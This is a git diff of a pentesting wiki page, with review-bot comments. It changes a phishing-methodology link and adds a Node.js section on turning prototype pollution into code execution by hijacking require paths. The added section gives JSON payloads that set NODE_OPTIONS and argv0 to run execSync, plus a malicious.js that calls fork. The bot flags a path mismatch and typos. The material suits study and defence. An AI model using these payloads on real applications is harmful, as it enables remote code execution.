GitBook: [#3463] No subject
This commit is contained in:
parent
ad3e575f33
commit
e23cfa1aad
@ -87,7 +87,7 @@ In order to make sure that the expired domain that you are going to buy **has al
|
||||
* [https://hunter.io/](https://hunter.io)
|
||||
* [https://anymailfinder.com/](https://anymailfinder.com)
|
||||
|
||||
In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration).\
|
||||
In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../phishing-methodology/broken-reference/).\
|
||||
Moreover, don't forget that if the users use **any web portal to access their mails**, you can check if it's vulnerable to **username brute force**, and exploit the vulnerability if possible.
|
||||
|
||||
## Configuring GoPhish
|
||||
|
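Review bot: the replaced link on the changed line of this hunk now points at `../../phishing-methodology/broken-reference/`, which reads like the placeholder GitBook emits for an unresolved link, so the "Learn how to verify/discover email address here" text no longer leads anywhere; the removed target `../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration` named the actual SMTP user-enumeration section, so restore that path (or the page's current location) instead of shipping the placeholder. While the line is touched, "brute-force them smtp servers of the victim" should read "brute-force the SMTP servers of the victim".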
@ -159,8 +159,118 @@ var proc = fork('a_file.js');
|
||||
|
||||
## Forcing Spawn
|
||||
|
||||
In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it.\
|
||||
In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute an spawn method when imported**.
|
||||
In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it.
|
||||
|
||||
### Controlling a require file path
|
||||
|
||||
In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute an spawn method when imported.**\
|
||||
****Some examples of common files calling a spawn function when imported are:
|
||||
|
||||
* /path/to/npm/scripts/changelog.js
|
||||
* /opt/yarn-v1.22.19/preinstall.js
|
||||
|
||||
### Setting require file path via prototype pollution
|
||||
|
||||
{% hint style="warning" %}
|
||||
The **previous technique requires** that the **user controls the path of the file** that is going to be **required**. But this is not always true.
|
||||
{% endhint %}
|
||||
|
||||
However, if the code is going to execute a require after the prototype pollution, even if you **don't control the path** that is going to be require and this **path is relative**, you **can force a different one abusing propotype pollution**. So even if the code line is like `require("./a_file.js")` it will **required the package you set**.
|
||||
|
||||
Therefore, if a require is executed after your prototype pollution and no spawn function, this is the attack:
|
||||
|
||||
* Find a **`.js` file inside the system** that when **required** will **execute something using `child_process`**
|
||||
* If you can upload files to the platform you are attacking you might upload a file like that
|
||||
* Pollute the paths to **force the require load of the `.js` file** that will execute something with child\_process
|
||||
* **Pollute the environ/cmdline** to execute arbitrary code when a child\_process execution function is called (see the initial techniques)
|
||||
|
||||
#### Method 1 to set arbitrary require
|
||||
|
||||
{% tabs %}
|
||||
{% tab title="exploit" %}
|
||||
{% code overflow="wrap" %}
|
||||
```javascript
|
||||
// Create a file called malicious.js in /tmp
|
||||
// Contents of malicious.js in the other tab
|
||||
|
||||
// Manual Pollution
|
||||
b = {}
|
||||
b.__proto__.exports = { ".": "./malicious.js" }
|
||||
b.__proto__["1"] = "/tmp"
|
||||
|
||||
// Trigger gadget
|
||||
var proc = require('./relative_path.js');
|
||||
// This should execute the file /tmp/malicious.js
|
||||
// The relative path doesn't even need to exist
|
||||
|
||||
|
||||
// Abusing the vulnerable code
|
||||
USERINPUT = JSON.parse('{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}')
|
||||
|
||||
clone(USERINPUT);
|
||||
|
||||
var proc = require('./relative_path.js');
|
||||
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
|
||||
```
|
||||
{% endcode %}
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="malicious.js" %}
|
||||
```javascript
|
||||
const { fork } = require('child_process');
|
||||
console.log("Hellooo from malicious");
|
||||
fork('/path/to/anything');
|
||||
```
|
||||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
#### Method 2 to set arbitrary require
|
||||
|
||||
{% tabs %}
|
||||
{% tab title="exploit" %}
|
||||
{% code overflow="wrap" %}
|
||||
```javascript
|
||||
// Create a file called malicious.js in /tmp
|
||||
// Contents of malicious.js in the other tab
|
||||
|
||||
// Manual Pollution
|
||||
b = {}
|
||||
b.__proto__.data = {}
|
||||
b.__proto__.data.exports = { ".": "./malicious.js" }
|
||||
b.__proto__.path = "/tmp"
|
||||
b.__proto__.name = "./relative_path2.js" //This needs to be the relative path that will be imported in the require
|
||||
|
||||
// Trigger gadget
|
||||
var proc = require('./relative_path.js');
|
||||
// This should execute the file /tmp/malicious.js
|
||||
// The relative path doesn't even need to exist
|
||||
|
||||
|
||||
// Abusing the vulnerable code
|
||||
USERINPUT = JSON.parse('{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}')
|
||||
|
||||
clone(USERINPUT);
|
||||
|
||||
var proc = require('./relative_path.js');
|
||||
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
|
||||
```
|
||||
{% endcode %}
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="malicious.js" %}
|
||||
```javascript
|
||||
const { fork } = require('child_process');
|
||||
console.log("Hellooo from malicious");
|
||||
fork('/path/to/anything');
|
||||
```
|
||||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
## References
|
||||
|
||||
* [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
|
||||
* [https://blog.sonarsource.com/blitzjs-prototype-pollution/](https://blog.sonarsource.com/blitzjs-prototype-pollution/)
|
||||
* [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf)
|
||||
|
||||
<details>
|
||||
|
||||
|
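Review bot: in the Method 2 "exploit" tab the manual pollution sets `b.__proto__.name = "./relative_path2.js"` while the gadget that follows is `require('./relative_path.js')`; the inline comment on that same line says the name must be the relative path passed to `require`, so as written the manual example would not resolve to `/tmp/malicious.js` (the JSON payload further down correctly uses `"name": "./relative_path.js"`). Change the manual line to `"./relative_path.js"` so the two halves of the tab agree. Smaller points in the same hunk: the closing comment of both exploit tabs says the payload "create the file /tmp/pp2rec", but the `execSync` call runs `touch /tmp/pp2rce2`, and "wich" should be "which"; the `****` before "Some examples of common files calling a spawn function" is a stray empty bold pair and should be removed; and the new prose lines carry typos that will now be on the published page: "part of the the code", "an spawn method", "the file path were a `require`" (should be "where"), "propotype pollution", and "it will required the package you set" (should be "it will require").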